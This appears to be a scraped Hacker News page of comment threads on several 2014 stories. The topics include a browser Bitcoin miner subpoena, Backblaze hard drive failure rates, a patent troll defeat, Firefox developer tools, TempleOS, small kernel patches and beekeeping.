I think 1. is the weakest point, but that weakness is based on my understanding of the definition of 'hijack'. 2. and 3. seem to follow easily from assumptions, or could be easily shown as fact. 4. seems like it would be harder to prove, but I don't know the implications of the term affirmatively used here.

14
everettForth 2 days ago 0 replies      
This sounds like some trivial code, not even fully functioning, that was written during a hackathon. Why does New Jersey care?

It wouldn't even make sense as a business model anymore, because asic miners are so much more efficient than GPUs, but I heard many people talking about building this kind of service years ago.

NJ could pay a software developer to write them code to let people generate small amounts of bitcoin in a browser. Why would they possibly want this MIT student's code so badly?

15
codexon 2 days ago 1 reply      
I don't understand how their javascript based miner is feasible.

Mining bitcoins with a CPU is an extremely futile endeavor, and on top of that, it is implemented in asm.js.

Even with thousands of workers, GPU and ASIC mining is anywhere from hundreds to over a MILLION MH/S while modern cpus top out at 20 with most around 5.

https://en.bitcoin.it/wiki/Mining_hardware_comparison

16
chris_wot 1 day ago 0 replies      
Funny how voting machine companies won't release their source code, but MIT must for Bitcoin? Just a thought.
17
larssorenson 2 days ago 0 replies      
I don't understand how it could be considered consumer fraud or computer fraud and abuse if it was clearly indicated to the visitor that their browser would be used as a BitCoin miner in lieu of being displayed Ads. Assuming they weren't told, I could see the issue but it didn't seem like they were trying to dupe visitors.
18
squozzer 2 days ago 0 replies      
It sounds to me like NJ wants to start mining bitcoin. Nothing is sacred when you're running a deficit I guess.
19
trhway 2 days ago 0 replies      
they need to bring in a couple of seasoned enterprise developers who can hand off any project in such a state that it would be easy to rewrite it from scratch than to even just successfully build it, less run/debug/understand...
20
ndesaulniers 2 days ago 1 reply      
HACKERS!!! WONT SOMEONE PLEASE THINK OF THE CHILDREN!!!?
21
Thesaurus 2 days ago 1 reply      
Is there another website other than wired with this article?
22
u124556 2 days ago 1 reply      
They could just, you know, give it to them?
23
javajosh 2 days ago 0 replies      
How is surreptitious use of compute resource any different than the surreptitious accumulation and analysis of data exhaust? If this moves forward to prosecution, I'd argue it will actually open up an avenue of attack against Facebook, Google, et al.
24
joshfraser 2 days ago 2 replies      
We're lucky to have an organization like the EFF that fights this nonsense. It's a good time to support their work.

https://supporters.eff.org/donate

25
stealthlogic 2 days ago 0 replies      
Fuck New Jersey.
11
Hard Drive Reliability Update Sep 2014
374 points by nuriaion  1 day ago   155 comments top 24
1
disordr 1 day ago 3 replies      
I really want to applaud backblaze for publishing these reports and stats. Too many companies closely guard this information that really helps the larger community. Based on the previous blogs from backblaze, when I built out our new hadoop cluster, I purchased 1450 Hitachi drives. I plan to gather our failure rates and publish them as backblaze does.Thanks for blazing the path!
2
zaroth 1 day ago 8 replies      
Since annual failure rate is a function mostly of age, it would be interesting to see a line chart of cumulative failure rate vs age. But since new drives are continually being added to the population, there would be fewer drives in the data set as you moved up each curve.

I guess you could calculate confidence intervals at quarterly intervals, and so the error bars would get larger as age increases and 'n' decreases.

How would you calculate the CI for failure rate? It's not binomial or poisson, since failure rate goes to 1 over time...

A little searching turns up http://rmod.ee.duke.edu/statistics.htm which I'm sure completely explains how to do this... (rolls eyes). I hate that this is how statistics is commonly taught. Knowing which distribution to use and applying it correctly can actually be intuitive if taught properly. It doesn't always need to be an exercise in alphabet soup / deriving from base principles.

3
ChuckMcM 1 day ago 1 reply      
One of the challenges I have with this analysis is that a 'failure' isn't just that your drive is no longer working, it is that your drive isn't working and you have to go replace it. The operational costs of replacing a drive have three parts, loss of production while the drive is offline, operator time to physically replace the drive and prep it for re-entry into the system, and transactional costs of doing a warranty replacement (filling out the RMA form, getting a valid RMA, shipping the and receiving replacements). We minimize the latter by doing RMAs in batches of 20 but its still a cost across those 20 drives. (and the population of 40 drives which exist as spares are effectively not available for production). It isn't as simple as 'sure drives fail a bit more often but we don't expect to use them that long.'
4
michaelbuckbee 1 day ago 3 replies      
Biggest takeaway was at the end, with the "enterprise" drives being slightly less reliable than the consumer ones at half the cost.
5
emodendroket 1 day ago 8 replies      
How times have changed; Seagate used to be (or at least have the reputation of being) the most reliable and Hitachi the least.
6
shiftpgdn 1 day ago 2 replies      
I manage a computation cluster for an oil and gas exploration company. We have a 50% failure (and rising!) of Seagate Constellation drives in 250GB, 1TB and 2TB configurations. My sample size is fairly small at a few hundred drives but man does it keep me busy.
7
archgrove 1 day ago 1 reply      
Not that I use even 0.001% of the disks that BackBlaze go through, but my anecdata suggests the same. The only dead hard disks I have on my desk at the moment are Seagate, and they dominate the disks I've sent back in the last few years.

However, they are cheap, and they do honour their warranties. Would just be nice if they didn't have to quite so much.

8
saosebastiao 1 day ago 2 replies      
Tangential: When are you going to offer a linux client?
9
tambourine_man 1 day ago 3 replies      
I love reading these posts from Backblaze, but what I never understand is that they are getting a cost of U$ ~0.05/GB with their storage pods:

https://www.backblaze.com/blog/why-now-is-the-time-for-backb...

At these rates, why not use S3? What am I missing?

10
makmanalp 1 day ago 1 reply      
Anyone have any reliability information on hitachi's new NAS drive series? They're supposed to build on the 7k3000 etc, but specifically tailored for NAS / raid situations, like WD reds. One major difference is that they're 7200 rpm instead of 5400 which is most non-high-end NAS drives.
11
cake 1 day ago 2 replies      
I wish there was something similar for SSDs.
12
justcommenting 1 day ago 1 reply      
There are well established methods for time-to-failure and time-to-event data not used here. The author makes no effort to control for the multiple, obvious biases created by the analytical approach employed. A few simple graphs would give a much more telling view of these data.
13
TheLoneWolfling 1 day ago 0 replies      
I'd be interested to see what a graph of percentage remaining versus time since installation looks like for these. Might give a better picture of what's going on.
14
BuckRogers 23 hours ago 1 reply      
I keep seeing this stuff over the years, so I go buy something other than Seagate like WD... and they fail within a year. So I replace it with a Seagate and no problems for years. See another report that says Seagate is terrible- repeat process.

I'm just going to keep using Seagate until my anecdata refutes the reality I live in.

15
shadeless 1 day ago 0 replies      
I recently bought 3TB Western Digital Red, following their advice from [1], but now I see that it has yearly failure rate of 8.8%, bummer.

Off-topic, but It's a shame that BackBlaze isn't available in some countries, I'd love to use it. What would be the best alternative to it, Tarsnap?

[1] https://www.backblaze.com/blog/what-hard-drive-should-i-buy/

16
rancor 1 day ago 0 replies      
Used in a small file server, my net failure rate on Seagate's consumer 3TB drives has been over 50% thus far. The pair of their SAS drives I currently have in use have been fine, although both of them are still below a year of service life...Edit: Just checked my drive status, and yet another one has dropped. If I'm doing my math correctly, that's 75% of the drives that weren't DOA...
17
cgore 1 day ago 2 replies      
My main Linux box has quite a few hard drives in it from a large range of time. About 4 weeks ago the oldest of them all died: it is from 2007, so about 7 years old, which I think is pretty good for a consumer drive that's on 24/7. It was a Western Digital Caviar SE WD3200JB, 320GB. I replaced it with a 2TB drive.

[No lost data, I do daily backups.]

18
sauere 1 day ago 1 reply      
Hard drive age a bad parameter to use. It should be the hours the drive was actually powered on.
19
BradRuderman 1 day ago 1 reply      
Let's get a blog post describing how they handled reimbursements for the drive farming. I imagine it to be incredibly complicated to cross reference a receipt with a product at that scale , especially since all the products were the same.
20
arb99 1 day ago 1 reply      
Very off topic, but their html is wrong:

"<a href='https://www.backblaze.com/blog/hard-drive-reliability-update... src='https://www.backblaze.com/blog/wp-content/uploads/2014/09/bl... alt='Hard Drive Failure Rates by Model' width='560px' border='0' /></a>"

should be "width='560'" not "width='560px'"

21
ars 1 day ago 1 reply      
No Toshiba hard disks apparently.

HGST and Wester Digital are the same company, but it seems they have separate product lines? It's confusing.

22
mercurialshark 1 day ago 1 reply      
All my WD and Seagate drives have failed within two years of use. Call me the luckiest.
23
robomartin 1 day ago 0 replies      
Thanks for sharing such useful data. I just had a Seagate drive fail. Was able to recover data since the last local backup with various tools. It took hours of repair work.

I've been procrastinating about getting off-site backup. This post on HN reminded me that I've been meaning to get an account going with your company for a while. I just signed up and will test on my machine before deploying to other machines in my business. Thank you.

24
larrys 1 day ago 2 replies      
Question for the OP here (or for anyone else).

Do you burn in new drives before using? I typically will take any new drive and do some type of stress test [1] on it for 18 to 24 hours to see if it fails with that initial constant use.

[1] Constant reformatting for example writing 0's to the entire disk 7 times etc.

12
Another Patent Troll Slain. You Are Now Free to Rotate Your Smartphone
381 points by VanL  2 days ago   41 comments top 9
1
crhulls 2 days ago 6 replies      
Startups can pool together to fight these guys. My company, Life360 got sued after raising $50m. They thought this meant we had money to write checks from, but instead we decided to use it to fight.

We're basically being sued for allowing you to click a marker on a map initiating a phone call.

This obviously should never have been patented, so we are doing all the legal defense work and sharing it with the startup community.

See www.stopagis.com if you want to see how we really pissed off our troll.

And public shaming also works, the CEO of our troll didn't own his domain, so we bought it and drive traffic to the site whenever people search for his name (Malcolm Beyer www.malcolmbeyer.com). They don't like that we "aren't playing by the rules".

2
r00fus 2 days ago 9 replies      
"Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. Its Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This means that Rackspace will not pay one penny to this troll, nor will Apple, Netflix, Electronic Arts, Target, Whole Foods or any of the other companies sued by Rotatable for how they use screen rotation technology in their apps."

It surprises me why there aren't joint defense funding efforts in place to put these industry pests to bed... Clearly Apple, Google and Microsoft would have been next on Rotatable's target list if Rackspace had caved - and like weeding, rooting them out early will prevent infestations.

Is it because the big corps perhaps view the trolls as worth their pain - what function could they serve?

3
jmedwards 1 day ago 0 replies      
Rotatable sued us and immediately asked for $75,000 to go away. We refused. And we fought. Its Rackspace policy to not pay off patent trolls, even if it costs us more to fight. Eventually Rotatable offered to just walk away but we refused again. Just as we promised last year, we challenged the patent and the USPTO invalidated it.

This is an excellent strategy and will pay dividends to RackSpace in the long term: what minor patent trolls will touch them now?

4
ps4fanboy 2 days ago 2 replies      
This has really bought rack space a lot of good will in my mind. Everytime I read an article like this I find myself wanting to do business with them more and more.
5
luxstyle 2 days ago 2 replies      
Why do trolls still try to sue Rackspace? They publicly proclaim their anti-troll policy. If 88% of these cases kill the troll when they go through the courts fully, I would stay well away from them if I was a patent troll.
6
shittyanalogy 1 day ago 2 replies      
This is fun and all but calling the patent troll slain is a bit optimistic. Most likely "Rotatable Technologies" was specifically created to sue companies for this patent so they could simply go out of business if things got too rough. The larger patent troll, I'm sure, considers this loss a normal part of doing business and will continue with other patents. This does not get any better simply because one patent was invalidated.

We need legislative change, not to fight fire with fire. Public perception of these companies being trolls and detrimental to innovation is important but this is not a victory. It is simply not a loss and still an enormous waste of resources. We need patent reform.

7
arbuge 2 days ago 0 replies      
>> We are still fighting some of the trolls that have come after us and we expect to win those cases too. Without changes in the law we believe that the only way to end the plague of patent trolls is by fighting every troll that comes at us and we encourage all others to do the same.

Needless to say, Rackspace can afford this strategy whereas smaller companies, who have no full-time attorneys on staff and little funds to retain outside counsel, generally cannot. A change in the law is needed to legislate patent trolls out of existence is still needed, basically yesterday.

8
dthunt 2 days ago 1 reply      
I am a strong advocate of the following principle:

Defeat your enemies.

Rackspace deserves some big props, here. More should follow their example.

9
tempodox 1 day ago 0 replies      
Nice going, and a service to the community. Thanks!
13
New Developer Tools Features in Firefox 34
362 points by xOnic  2 days ago   65 comments top 21
1
azinman2 2 days ago 2 replies      
Ok debug logging into a table is probably one of the best improvements to logging I've seen in a long time. I kinda want this in every programming language. There are so many useful things about it, especially the ability to then randomly sort it at will!
2
bshimmin 2 days ago 3 replies      
The jQuery events inspector looks super useful.

I keep meaning to give Firefox another try - after ditching it for Safari, and then Chrome, some years ago - but I never quite find the motivation.

3
diafygi 2 days ago 1 reply      
Is the bug that treats re-requests source files when opening the debugger fixed yet?

https://bugzilla.mozilla.org/show_bug.cgi?id=156435#c52

4
genericacct 2 days ago 2 replies      
I was excited about the WebIDE but apparently it's only for firefox OS apps. Is there any way of linking a webIDE to devTools? I'd pay for a tool that lets me click on a jsconsole error message and then takes me straight to the editor at that line and column on the original file.
5
frankzander 2 days ago 0 replies      
What about firebug? Who long will firebug live with sight of the developer tools becomming better and better?
6
Kiro 2 days ago 2 replies      
Finally a way to easily inspect and delete cookies on the run. I remember getting voted down here for complaining about it previously.

EDIT: Ok, read-only. Too bad but at least they have it planned.

7
allan_s 1 day ago 1 reply      
something that got "broken" for me in recent version of firefox (I think starting with 32) is that doing a console.log of a very long string does not display the whole string anymore

i.e it will print

"a looooooong string [..]" (with the [..])

same if i try to observe the variable in the debugger. And I cant find a way to get the full string in anyway, I understand for a lot things you dont want to print accidentally a 200k characters longs string as it will use a lot of memory for maybe nothing, but in my current use case (getting long xml documents to copy paste them in a beautifier / send to colleague as attachments for bug report etc.) it breaks my workflow (I'm posting here because google does not seems very talkative about this issue)

8
Tloewald 2 days ago 2 replies      
A ton of very compelling stuff. I hope it all works nicely; I have found the Firefox dev tools to be weirdly clunky of late and keep going back to Chrome, but this may drag me back.
9
geekam 2 days ago 0 replies      
Finally, the storage manipulation has arrived. Now I can get rid of Firebug completely.
10
pdknsk 2 days ago 1 reply      
The only feature in Firefox I miss in Chrome is the view that shows the stacked layers of a website. I dismissed it when I first tried, but it can be surprisingly useful. It's no reason to make me switch to Firefox though.

https://developer.mozilla.org/docs/Tools/3D_View

11
leeoniya 2 days ago 1 reply      
is there any way of making the inspector show simple textContent inline with the nodes without having to unfold them? i keep going back to Firebug for this.

    <em>test</em>
rather than

    <em>       test    </em>

12
dubcanada 2 days ago 1 reply      
Does anyone know if there is a way to theme the developer tools? Like you can do in Chrome?

Like https://chrome.google.com/webstore/detail/devtools-theme-zer...

13
ck2 2 days ago 1 reply      
I'm more excited about this coming in the next version(s)

https://wiki.mozilla.org/Electrolysis

http://arewee10syet.com/

Back in August they were debating enabling by default in November but it is probably not ready for prime-time yet

https://wiki.mozilla.org/Electrolysis/Meetings/2014-08-21

14
gioele 2 days ago 2 replies      
How big are the developer tools compared to the rest of Firefox? 5% of the total size? 10%?

Can't the more sophisticated tools be split into a separate extension, leaving only some basic things in the distributed package?

15
arenaninja 2 days ago 0 replies      
Sweet, sweet console.table()! I've never been happy with the way that console.log works for objects/arrays, I'm eager to use this one
16
kolev 2 days ago 0 replies      
This is great! Firefox Aurora has been my main browser for over 6 months and now these great improvements will keep the status quo for me!
17
iSnow 2 days ago 0 replies      
Oh, this is neat. This is probably the first time the built-in debugging tools make me think about ditching FireBug.
18
ux-app 2 days ago 0 replies      
great to see the iframe switcher. Was such a pain to manually switch the context between top and child frames.
19
vvh 2 days ago 0 replies      
good list of tools, thanks!
20
Gonzih 2 days ago 1 reply      
Sourcemaps?
21
arahaya 2 days ago 0 replies      
&nbsp;
14
TempleOS: 5 minute random code walkthrough
357 points by GuiA  2 days ago   168 comments top 33
1
Mithaldu 2 days ago 1 reply      
These videos already make me inordinately happy, because everything about templeos is beautiful, and having it explained is so very nice. However the most beautiful take-away from these videos to me is that Terry has a bird. :)
2
chippy 2 days ago 3 replies      
I want to build in some kind of primitive networking into this OS - just so one machine can talk to another... it's on my side project list. Anyone had much experience with the code?

Also - Love the positive comments in this thread. Proud of this community.

3
M4v3R 2 days ago 5 replies      
It makes me sad that even with his illness he delivered more working code than I probably will ever do. Maybe not because I can't, but because I procastinate so much and I really have hard time focusing on doing work.
4
microcolonel 2 days ago 0 replies      
I had a conversation with Terry on freenode a couple years ago, back when TempleOS was "losethos".

I was convinced, given the context, that losethos was just computer malware, and he had a hard time articulating why it wouldn't be, and ended up just getting frustrated at the most cursory of questions.

A few days later, somebody who had witnessed the conversation informed me that he was a well known probable schizophrenic, and it really bummed me out that I didn't know or handle the situation better.

While he hasn't convinced me of anything other than that having nice uniform names for types can be helpful(U64, S64, F64, etc.), that conversation gave me some perspective on what it means to be schizophrenic.

5
userbinator 2 days ago 1 reply      
What makes this amazing is that Linus Torvalds probably wouldn't be able to pick a random piece of code in the Linux kernel and do this.

The fact that it's quite featureful for an OS of ~100kLOC - including an assembler and compiler for a language with some OOP - makes this even more interesting. "The shell is a compiler/interpreter" concept somewhat reminds me of Lisp machines too.

6
orbifold 1 day ago 1 reply      
One concept I really like is to just identity map the whole address space and run everything with full priviledges. With a sufficiently high level memory safe language with good concurrency and memory regions support, you should be able to statically enforce most of the guarantees that the hardware provides and at the same time get rid of context switches. Untrusted code in a memory unsafe language would simply run in a VM.
7
Igglyboo 2 days ago 0 replies      
This guy never ceases to amaze me, he's insanely smart and dedicated.
8
andrewljohnson 2 days ago 2 replies      
Random numbers coming from God is cute. I'm not a theist, but I also feel awe of the elusive concept of true randomness. I read something about this from him before, and it pops up in the 1st video.

The flashing Menu button and marquee filename are interesting. A distraction to most people, but I wonder if they help the author Terry stay focused.

9
sitkack 2 days ago 0 replies      
The world is definitely better off with Terry. Thanks man and keep on doing your thing.
11
incision 2 days ago 1 reply      
Neat, subscribed.

I make a point to read TempleOS' comments. Looking past the frequent nastiness they're sometimes interesting and even poetic, in a way that's as sadly familiar as the intonation in these videos.

12
tlo 2 days ago 4 replies      
Can somebody explain in a few words what TempleOS is?
13
callahad 2 days ago 1 reply      
I love the idea of a built-in hotkey for jumping to a random line across the entire codebase. Like a fuzzer, but for your understanding of your project.

...and now I really want to write a vimscript to do the same.

14
codezero 2 days ago 0 replies      
I actually like the idea of having to pick a random routine in a large codebase and then explaining it on the fly. Terry does a pretty good job at this, he's done similar things in other videos.
15
qznc 1 day ago 0 replies      
I like the idea for quick impromptu presentations, so a made a script for git: https://github.com/qznc/dot/blob/master/bin/git-randomline

$ vi $(git randomline)

Then explain to someone in five minutes

16
curiousDog 2 days ago 3 replies      
As much as I appreciate what he did (most of us wrote a bare bones OS in school anyway), I'm not a fan of his racist comments. Some are incredibly specific like "I can't believe a nigger is the boss of a white guy, that just isn't right" or something like that. It's like he has these thoughts actually bottled up but cannot control them because of his illness. Nonetheless, my bad to rain on someone with such an illness. All the best to him.
17
LukeB_UK 2 days ago 1 reply      
All the flashing bits and marquees... I never thought that someone could create an OS that reminds me of GeoCities
18
cmdrfred 2 days ago 2 replies      
I hope medical science can one day find a way to help our friends like Terry find their way home. Until then all we can do is let him know that he is loved and respected by his peers, Terry you are one of us.
19
broken 2 days ago 1 reply      
"showdead -> yes" is the only reason i have a HN account.
20
gojomo 2 days ago 1 reply      
What if the giant computing platform battle of 2040 is TempleOS vs. Urbit, because everyone else got neurobricked by the iBrain/mindroid 0day of 2034?
21
ivans__ 2 days ago 0 replies      
Terry is always a huge inspiration to me!
22
donatj 1 day ago 0 replies      
A little over a year ago I wrote a post about the problems I saw in Coffeescript, Terry commented that switching to TempleOS would prevent my complaints as I could use his C variant. Made my day to have him comment.
23
no_future 2 days ago 1 reply      
Terry is a goddamn hero and an inspiration to us all
24
axaxs 1 day ago 0 replies      
I'd just be happy for a usable Holy C. Growing up in the south, I can perhaps sadly deal with the political or racist rants. Putting that aside, I think the man is a genius who has much to offer the world. I'd love for someone like this to mentor me, though such a thing is hard to find outside academia.
25
desireco42 2 days ago 0 replies      
After looking at some of videos and intro, he is onto something with this. You can always run this in vm, I can see how permissions and ownership can get in a way. By using subroutines, he gets every ounce of juice out of his machine.Also document format, based on his description, sounds awesome.
26
smegel 2 days ago 0 replies      
If nothing else, this guy's got staying power.
27
thaumaturgy 2 days ago 1 reply      
Does anyone have the code for the PRNG handy, or is familiar with it? It'd be kinda neat to see how that bit works.
28
MarkPNeyer 2 days ago 0 replies      
i've been through a lot of psychosis and feel like i can understand this guy. i had a psychotic break in late 2012 and thought strongly that catholicism was created to teach the world computer science concepts.

when you start reading about roko's basilisk, it's not a stretch at all to imagine that primitive human beings exposed to an artificial intelligence would think of it like 'god'.

29
namecast 2 days ago 1 reply      
Shine on, Terry, you crazy diamond.

If nothing else, TempleOS is a testament to how much one programmer can accomplish absent feedback or collaboration from others. For better or worse.

30
Davesjoshin 2 days ago 6 replies      
How come his rants have a lot of racial slurs? Am I missing something? http://www.templeos.org/Wb/Accts/TS/Wb2/Rants/TAD/2014/09/Ra...
31
elwell 2 days ago 1 reply      
Let's all hope Terry doesn't learn AI enough to equip TempleOS with the ability to learn (as well as networking). There's is no guessing as to what a randomized OS with a god-complex might do.
32
cmdrfred 2 days ago 2 replies      
What if he's right?
33
cschep 2 days ago 3 replies      
Whhhaaaaat the hell? Is this real?
15
One Thing Well A weblog about simple, useful software
364 points by tete  3 days ago   46 comments top 16
2
Argorak 3 days ago 1 reply      
This tumblr doesn't quite live up its name: http://onethingwell.org/post/97725615916/busybox

BusyBox is great and everything, but it's definitely not subscribing to the "One Thing Well"-philosophy, quite the contrary: everything in one.

3
asymmetric 3 days ago 1 reply      
OT, but it's heartening to see a link to an RSS feed next to Twitter and G+. I find that more and more sites are abandoning this public, open source standard in favor of proprietary platforms.
5
state 3 days ago 3 replies      
Sorry, but there is nothing I find more annoying than the "Never miss a post!" spam that Tumblr now inserts in to every page post acquisition.

Perhaps someone could do one thing well and come up with a blogging platform for this nice project?

6
eps 3 days ago 0 replies      
11 pages of Windows software! Who would've thought it exists :)

http://onethingwell.org/tagged/windows

7
tete 3 days ago 0 replies      
Disclaimer: Not my blog, but found it today and really loved it.
8
fizixer 3 days ago 1 reply      
- See also: suckless.org

- An LFS build off kernel.org (the kernel) and github (the rest of userland) would be an interesting experiment.

9
juef 3 days ago 0 replies      
10
denizozger 3 days ago 0 replies      
I love the idea but not the implementation. Categorising software according to purpose and tech stack would be the best.
12
tretiy3 3 days ago 1 reply      
Very good.Is there any way to subscribe (no count tumblr rss twitter)?
13
alanning 3 days ago 0 replies      
Short examples would greatly enhance comprehension for me
14
nXqd 3 days ago 0 replies      
This site could be named unix_hunt :D
15
zomg 3 days ago 0 replies      
the original "product hunt"! :)
16
doctorpangloss 3 days ago 3 replies      
> Simple, useful software

I came expecting examples of to-do lists, mail clients, clever messaging apps, etc. There are a handful of those.

Instead, the majority of apps are described by sentences where literally every word would be unfamiliar to a typical computer user. For example, "Cram is a functional testing framework for command line applications based on Mercurials unified test format."

Simple is in the eye of the beholder.

16
The biggest thing with small patches (2004)
338 points by ohmygeek  10 hours ago   28 comments top 13
1
doughj3 10 hours ago 0 replies      
I think this is great advice. While I've only contributed to a couple open source projects and haven't lead my own large ones, I completely agree. There's more to submitting patches than writing the patch- understanding contribution guidelines (code style, documentation, testing), responding to feedback, etc, these are all extremely important in actually contributing to a project. And having even just that little patch merged in feels great when you're starting out.

Plus, no one wants to make a big helpful functional contribution only to be thrown away because they weren't aware of how the community operates. Small patches have a low risk as far as learning about how to contribute, even if the patch is rejected for whatever reason.

Though this seems somewhat obvious, it's nice to have it stated and validated by the leadership of one of the largest open source projects.

2
efuquen 10 hours ago 1 reply      
Great attitude. Linus has had plenty of heated moments on the mailing lists, but 1) he's often right and 2) his venom is usually reserved for experienced developers that really should know better. Glad to him being so open and accepting with newbie kernel hackers.
3
shurcooL 8 hours ago 0 replies      
That makes a lot of sense. If I look at any project I've contributed to, it always started out with something small. Taking the time to make a small PR that makes a tiny improvement:

- shows you care about improving the project; you took the time to improve something small that others would ignore

- lets you test the waters. Are the project owners receptive of changes? Is it pleasant trying to contribute to the project? Or do they ignore your patch and don't reply for 2 weeks. You wouldn't want to spend a lot of effort just to find that out.

- gives you a chance to become familiar with the process, the tools, gain practice, and hopefully get rewarded with your change being accepted

For example, my first CL to Go was a trivial change:

https://codereview.appspot.com/97280043/patch/40001/50001

But without having done that (and having a good experience) I couldn't have been working on more complicated changes like https://codereview.appspot.com/142360043/ now.

4
munificent 8 hours ago 0 replies      
Small patches are the "hello world" of open source. They give you a chance to get familiar with and work through the contribution pipeline before you push something sizeable through.

There's little useful about "hello world" as a program, but it ensures you've got your toolchain working correctly, which is a necessary precondition for doing real work. Trivial patches are like that.

5
ljosa 10 hours ago 2 replies      
Ten years later, how is the Linux kernel community doing in terms of cultivating new contributors?
6
JacobEdelman 9 hours ago 3 replies      
Is it just me or is the main reason this is being upvoted so much is because Linus said something without a bad attitude? This isn't a rhetorical question, I honestly want to know.
7
post_break 9 hours ago 0 replies      
Reminds me of Lawrence of Arabia. "Big things have small beginnings" I've contributed tiny bug fixes and the feeling was great. I did that, me.
8
tehwalrus 6 hours ago 0 replies      
I completely agree. The only thing that's topped getting a tiny patch of my own accepted (into pylibtiff) was someone getting me to put a python module I'd written* onto pypi. Both were great feelings, and it's extremely important to encourage such highs in new people contributing to open projects (Linux kernel or random bibtex editor alike.)

* the library was in fact just a python wrapper for some C++ code, but that's where leverage for the original author starts, in bindings.

9
coherentpony 10 hours ago 0 replies      
That, ladies and gentlemen, is how you grow a community.
10
qwerta 8 hours ago 1 reply      
You need good set of unit tests if you want to survive managing open-source project.
11
vezzy-fnord 10 hours ago 1 reply      
Seems like it's good to remind people every now and then that Linus is a human with empathy, since a lot of them really don't understand the reasons for when he rants, and then start to draw conclusions.

On a related note, Theo de Raadt rants need far more attention than they currently get.

12
mwfogleman 10 hours ago 1 reply      
Woah, mentoring Linus had a good day!
13
GhotiFish 10 hours ago 1 reply      
That's a good attitude. If I find myself heading an open source project, I'll take that advice with me.
17
Loyalty Nearly Killed My Beehive
348 points by dnetesn  2 days ago   107 comments top 24
1
mudil 2 days ago 2 replies      
I started beekeeping 2 years ago, and I cannot be any happier about this hobby. It's easy and fun. Bees do not require feeding, cleaning, just an occasional check up. And they give my family the best honey the money can buy.

To start, I read (believe it or not) Beeking for Dummies (http://www.amazon.com/Beekeeping-For-Dummies-Howland-Blackis...). It's a well rated book, and it has all the basic info. Then I watched various YouTube videos.

Then I ordered the following list of supplies. (I buy all my equipment from Mann Lake. $100+ it's free shipping. http://mannlakeltd.com/)

This is a list I recommend:

Note that the hive boxes and frames, are unassembled. Mann lake does have assembled hives. Assembly is easy, and I did it with my kids.

1) WW-605_b Med Hive Qty. 52) FR-811 Med Frames Case of 10. Qty. 5 (so you get 50 frames)3) CV-305 Suit - economy - Medium (Buy YOUR size.) Qty. 14) HD-540 Smoker Qty. 15) CL-620 Economy cowhide leather gloves(Buy YOUR size. This is small) Qty. 16) HD-210 7D Nails (1lb) Qty. 17) HD-220 Frame Nails Qty. 18) HD-620 Hive tool9) HD-660 Bee Brush10) WW-310 Bottom Board11) Your choice of top cover (buy with Inner cover)... http://www.mannlakeltd.com/beekeeping-supplies/page29.html I practice foundationless but some prefer not to deal with the cross comb headaches and use foundation. Foundation part number is (FN-720).

I adopted my hive from Jack at Los Altos Honey Bees (http://losaltoshoneybees.wordpress.com/). He goes and rescues feral colonies.

I also joined Beekeepers' Guild Of San Mateo County (http://www.sanmateobeeguild.org/). The club is great: the mailing list discussions keep me informed about things to do right now, and what to do to prepare for upcoming seasons.

2
radicaledward 2 days ago 3 replies      
DO NOT FEED YOUR INFANT HONEY

Just in case anyone read the first paragraph and thought, "Hey that's a good idea!" Honey contains bacteria that causes infant botulism [1]. Once a child has a more fully developed digestive system, this is no longer a problem.

[1] http://en.wikipedia.org/wiki/Botulism#Infant_botulism

3
SEJeff 2 days ago 4 replies      
Absolutely fascinating article. I'm really glad that HN contains the occasional non-tech related story. It seems somewhat obvious how an engineering mindset transfers very well to other disciplines, and unbeknownst to me, beekeeping is one of them.
4
flatline 2 days ago 2 replies      
> Queens typically live for about four or five years

This figure is from an old study that others have repeatedly failed to reproduce. More recent attempts to determine queen longevity have shown they live to an average of about a year, and furthermore failed to find any of significantly advanced age. So it shouldn't too much of a surprise that she only lasted a season. Since there seem to be a few beekeepers hanging out here, I'd be curious to hear anecdotal evidence of queen lifespan.

5
Qworg 2 days ago 3 replies      
If you like this story, I'd unabashedly recommend that you try and keep bees. They are relatively low maintenance, interesting to observe and fun to debug (no pun intended). Success is amazing - both to eat and think about.

The other benefit is psychological - beekeeping requires an almost zen like approach when dealing with the hive. You cannot get angry or flustered, even when surrounded by thousands of bees desperately trying to sting you. You have to focus, be calm, and do the work.

6
MechSkep 2 days ago 2 replies      
One of my side projects is building a sensing electronics package to monitor the health and activity of beehives. The idea is to make it easier for someone just starting to maintain their hive.

Any one have feedback on the concept? Or features we haven't thought of?

7
k_sze 2 days ago 1 reply      
I'm a huge fan of ants, bees, and wasps, but I have never kept bees, only ants. There is something I don't understand.

Is there any rational advantage to keeping the beehive alive between the two queens, especially since the new queen is probably only remotely related in terms of genealogy? Is it just so the production of honey, propolis, etc remains uninterrupted? What happens if you let a beehive completely die and then put in a new queen? Would the beehive become too filthy for the new colony to develop easily?

Or does the author's wish to keep the beehive alive only stem from emotional attachment?

8
qwerta 2 days ago 1 reply      
I never heard of replacing queens, beehive always raised new one. But perhaps there are different methods in Europe.

I have good story to share: we had 10 beehives at cabin in middle of woods and one of them got stolen! We moved remaining across the town to safer location. Carrying 100 pounds out of which 40 pounds are life bees is quite something :-)

9
csorrell 2 days ago 2 replies      
This is why I always recommend new beekeepers start out with at least two hives. If the author had another healthy hive, he could have moved a frame of young brood to his queenless hive and they would have raised a new queen on their own.
10
jackgavigan 2 days ago 1 reply      
There's a whole industry around renting beehives to farmers to pollinate crops: http://www.scientificamerican.com/article/migratory-beekeepi...

There's an interesting supply'n'demand thing going on as a result of the decline in the bee population, coupled with the growth of almonds as a cash crop: http://scientificbeekeeping.com/2012-almond-pollination-upda...

11
gresrun 2 days ago 0 replies      
My friends are currently serving as missionaries in Tanzania and are teaching the art of beekeeping to help diversify the local economy and diet: http://makondefrasers.wordpress.com/
12
hiharryhere 2 days ago 0 replies      
Great article, well written and fun. Though how is nobody weirded out by him just leaving his hive on the roof of an apartment he no longer lives in. What a hilarious dude.
13
S_A_P 2 days ago 1 reply      
So is there any truth to the "africanized/killer"(I dont know any other way to state it but I dont like the term) bees being more difficult to manage and more aggressive? I live in Texas where they arrived in the early 1990s. I would be leery of keeping bees that were not as docile as the european variety. I am not too worried about getting stung once or twice, but I have heard that the "killer" bees go ape shit once the stinging pheromones have been released and you can get stung hundreds of times in a short time span.
14
Nanzikambe 2 days ago 0 replies      
A beautiful article, makes me yearn for that recent-convert's enthusiasm for a new hobby. Reminds me of when I first took up mycoculture. Perhaps I'll get a behive and join the legion of "that guy" :)
15
beginrescueend 2 days ago 0 replies      
